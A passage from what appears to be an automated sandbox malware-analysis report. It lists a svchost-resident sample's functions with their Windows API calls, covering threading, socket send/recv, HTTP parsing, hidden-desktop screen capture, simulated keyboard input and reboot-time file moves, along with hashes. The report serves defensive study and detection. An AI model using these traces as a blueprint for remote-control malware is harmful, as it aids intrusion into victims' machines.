                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c19a7a1ed6b0e709b9ecd2ac995cf761d4bee0658123ed2d5fbfff6376de192
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7412E319447495FCB2BDB28A8687FE7BE5AF4A300F1846D5D98AD7300DF619988C780
                                                                                                                                                                                                              Function 0265C110 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\private\), ref: 0265C139
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265C0E0,00000000,00000000,00000000), ref: 0265C186
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\public\), ref: 0265C19E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265C0C0,00000000,00000000,00000000), ref: 0265C1E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265C1FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265C20B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                              • String ID: \private\$\public\
                                                                                                                                                                                                              • API String ID: 677819612-281496920
                                                                                                                                                                                                              • Opcode ID: a543792f51909269ab6ae66ffa2d45f7637e9cfb8991c2761547d2976a56a1c9
                                                                                                                                                                                                              • Instruction ID: 2f67fa1ab0c39f458953eb0a4596a889c518822173d7a242393ce14edc0e4283
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a543792f51909269ab6ae66ffa2d45f7637e9cfb8991c2761547d2976a56a1c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA310430AC1375ABE7314EA8DC59B5E3798AB09F4CF145216ED016A3C0CBB698C1CBA4
                                                                                                                                                                                                              Function 0264E250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(0264CE3A,000000F0), ref: 0264E26B
                                                                                                                                                                                                              • GetLastActivePopup.USER32(0264CE3A), ref: 0264E279
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 0264E293
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 0264E296
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 0264E2AC
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000004), ref: 0264E2B5
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 0264E2EE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 3748940024-4251816714
                                                                                                                                                                                                              • Opcode ID: 1a7b996282de160bcf74d4bb170eb37ddfd1e1a707c05f6dafe11aa7b7d73a3d
                                                                                                                                                                                                              • Instruction ID: 68c5bb4324fbd2666c30c92ed4d62ecb15707193ceae4b4e4726f238dc59c22b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a7b996282de160bcf74d4bb170eb37ddfd1e1a707c05f6dafe11aa7b7d73a3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55112B71A4062463DB31AEAD9CC8FAFB75CBF41355F410625FE41E3280DF66844187E4
                                                                                                                                                                                                              Function 0264F000 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 247COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,0264FCE7,00000000,?,0264FCE7,,-04D1F5C8,00000000,00000000,0264FCE7,?), ref: 0264F0CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                              • API String ID: 0-1412996494
                                                                                                                                                                                                              • Opcode ID: 0858ae8acf342719f0a3fc8c4661d1ad3a4f493ba2433e4b8a59a3766555d5ef
                                                                                                                                                                                                              • Instruction ID: 2a52cb9c507bafa831a8ab4d24b3e411c491b27150d2caea857f128d717a0342
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0858ae8acf342719f0a3fc8c4661d1ad3a4f493ba2433e4b8a59a3766555d5ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E712931A01245ABEF24CE68C850BBE7BA5EF95718F148469D8C6D7B40EF72E941C790
                                                                                                                                                                                                              Function 0264C310 Relevance: 13.6, APIs: 9, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WindowFromDC.USER32(?), ref: 0264C31C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264C354
                                                                                                                                                                                                              • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 0264C362
                                                                                                                                                                                                              • GetClipRgn.GDI32(?,00000000), ref: 0264C36C
                                                                                                                                                                                                              • SelectClipRgn.GDI32(00000000,00000000), ref: 0264C37C
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0264C383
                                                                                                                                                                                                              • GetViewportOrgEx.GDI32(?,?), ref: 0264C38E
                                                                                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0264C3A2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264C3E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3315380975-0
                                                                                                                                                                                                              • Opcode ID: 3dfd943c93c15d8eb9db763d6b6cf5b0d5041b832056a64a4d85e24e238d2892
                                                                                                                                                                                                              • Instruction ID: 4ade364f971a9ae0d090b94576e5fe048ecacdc2b8590298f28f697e8978a769
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dfd943c93c15d8eb9db763d6b6cf5b0d5041b832056a64a4d85e24e238d2892
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B411C76651204BFCB14CF59DC84EAB77BDEB8C715B419609FA4AD7340DA30E890CBA0
                                                                                                                                                                                                              Function 004012B0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              Function 02649340 Relevance: 13.6, APIs: 9, Instructions: 52synchronizationsleepthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02649350
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(00000000,00000000), ref: 02648F3A
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteObject.GDI32(00000000), ref: 02648F49
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteDC.GDI32(00000000), ref: 02648F57
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(?,00000000), ref: 02648F67
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteObject.GDI32(00000000), ref: 02648F6F
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteDC.GDI32(?), ref: 02648F78
                                                                                                                                                                                                                • Part of subcall function 02648F20: GetDC.USER32(00000000), ref: 02648F7C
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleDC.GDI32(00000000), ref: 02648F8B
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleDC.GDI32(00000000), ref: 02648F93
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02648FB4
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(?,00000000), ref: 02648FC3
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02648FDE
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(00000000,00000000), ref: 02648FFD
                                                                                                                                                                                                                • Part of subcall function 02648F20: ReleaseDC.USER32(00000000,00000000), ref: 0264900C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 0264937C
                                                                                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 0264938B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264939E
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 026493B4
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 026493B7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,00000000), ref: 026493C6
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 026493CF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 026493DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4064958368-0
                                                                                                                                                                                                              • Opcode ID: d9e22d8fd8a13d6f920f1b030a74744f6ffb58e20146ea2744bd9ff30f8be0c6
                                                                                                                                                                                                              • Instruction ID: fdf6c1f0086bb372ebe794e0c7976dadf455a5817f2c0de8a412649f317fd7cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9e22d8fd8a13d6f920f1b030a74744f6ffb58e20146ea2744bd9ff30f8be0c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7113C75981205BBC710ABB5EE98D1F3BACAB483247016F09B512972C0DE75E890CBA1
                                                                                                                                                                                                              Function 00402FF0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              Function 0264CA90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(0264D21D), ref: 0264CAAF
                                                                                                                                                                                                              • GetWindowInfo.USER32(0264D21D,?), ref: 0264CAC9
                                                                                                                                                                                                              • GetClassLongA.USER32(0264D21D,000000E6), ref: 0264CB1E
                                                                                                                                                                                                              • PrintWindow.USER32(0264D21D,?,00000000), ref: 0264CB37
                                                                                                                                                                                                              • BitBlt.GDI32(0264CD02,?,?,?,?,753DBCB0,00000000,00000000,00CC0020), ref: 0264CBDE
                                                                                                                                                                                                                • Part of subcall function 0264DCE0: GetClassNameA.USER32(?,?,00000101), ref: 0264DCF6
                                                                                                                                                                                                                • Part of subcall function 0264C8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 0264C8F8
                                                                                                                                                                                                                • Part of subcall function 0264C8D0: GdiFlush.GDI32(00000000,?,0264C9F1,00000000,?), ref: 0264C90E
                                                                                                                                                                                                                • Part of subcall function 0264C8D0: BitBlt.GDI32(0264C9F1,00000000,00000000,?,0264C9F1,?,00000000,00000000,00CC0020), ref: 0264C934
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                              • String ID: <$@J=u
                                                                                                                                                                                                              • API String ID: 2334662925-1520792215
                                                                                                                                                                                                              • Opcode ID: 3312d3762d52897c5ef8d47d7be41d9d38681aaeeec58a78934f598647cb5451
                                                                                                                                                                                                              • Instruction ID: 4a7af5458c1ae4c71d4da1f2918d3988819b3b92d92a61ef32a9f72e3c35bc6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3312d3762d52897c5ef8d47d7be41d9d38681aaeeec58a78934f598647cb5451
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61415971E01519AFCB14CF98C885AAEFBBAFF84314F55825AE445A3740DB30A952CF94
                                                                                                                                                                                                              Function 02659A00 Relevance: 12.1, APIs: 8, Instructions: 98networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,02689E44,00000002,00000000), ref: 02659A2A
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02659A4E
                                                                                                                                                                                                              • recv.WS2_32(?,00000001,?,00000000), ref: 02659A7C
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02659AA0
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02659AC5
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0268FCA8,00000001,?,00000000), ref: 02659AED
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0268FBA0,?,?,00000000), ref: 02659AFF
                                                                                                                                                                                                              • send.WS2_32(?,02689E48,00000002,00000000), ref: 02659B0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$lstrcmpsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1090895577-0
                                                                                                                                                                                                              • Opcode ID: 6373f10b1ea27b55ef91256837449da11ce57bae9e719461c2c4827e9eda944d
                                                                                                                                                                                                              • Instruction ID: 62b39eb5298267bcc4eaa674e96ed946cc207ceccccbc09d3b58212f8a6cafb5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6373f10b1ea27b55ef91256837449da11ce57bae9e719461c2c4827e9eda944d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56319D72A4526979FB20A6544C41FFF77AC9F86700F0042C1EA44A2241D7B45A868BE0
                                                                                                                                                                                                              Function 02649BE0 Relevance: 10.7, APIs: 7, Instructions: 167synchronizationwindowkeyboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?,?), ref: 02649C41
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000000,00000000), ref: 02649C5F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?,?), ref: 02649D2F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?,?), ref: 02649D51
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02649D98
                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000003,00000000), ref: 02649DBE
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,?,?), ref: 02649DCB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3783495248-0
                                                                                                                                                                                                              • Opcode ID: f78a0dd7a2577a070adb5c6bfb54445523e9d4296a8666f00e1c3e77fdc71d04
                                                                                                                                                                                                              • Instruction ID: 1597ed4675b38d6f2126477dc09c4efb389789364429b9602cefc83c26bf5b97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f78a0dd7a2577a070adb5c6bfb54445523e9d4296a8666f00e1c3e77fdc71d04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF518E72AC6284FAD724CB64EC14BAF3FD59B42324F485689E8C18B3C2CF755695C790
                                                                                                                                                                                                              Function 02645A20 Relevance: 10.6, APIs: 7, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645A60
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645A8C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645AB3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02645AD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02645B04
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000002C0), ref: 02645B25
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02645B3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              • Opcode ID: 9a25f8a2105e8ab052312e8db63fa955bde2e7ea598140240b64449d6b085f9e
                                                                                                                                                                                                              • Instruction ID: 56a638674d4fd3dee625ce7b22934a50af98f843d47728d7bf654f6ade317eb9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a25f8a2105e8ab052312e8db63fa955bde2e7ea598140240b64449d6b085f9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3441E7B5D40208EFDB40DFA9D885AAEBBF5FB48311F95416AE905F7300EB709A41CB90
                                                                                                                                                                                                              Function 02645B50 Relevance: 10.6, APIs: 7, Instructions: 97synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02645B68
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645B99
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645BC5
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645BEC
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02645C1D
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000002C0), ref: 02645C3E
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02645C48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              • Opcode ID: d18d09215e1fdc2903c6c21822c0a0cef003370f1b29e913a5b7c65b02861eef
                                                                                                                                                                                                              • Instruction ID: 641d7714a511d2be8f54710132117a69e592fcbc7540bcc7b9f6b64459c53752
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d18d09215e1fdc2903c6c21822c0a0cef003370f1b29e913a5b7c65b02861eef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A731F8B1E41208EFDB40DFE9D885AEDBBF5FB48710F50856AE519E7200EB705A418F90
                                                                                                                                                                                                              Function 0264BB50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON
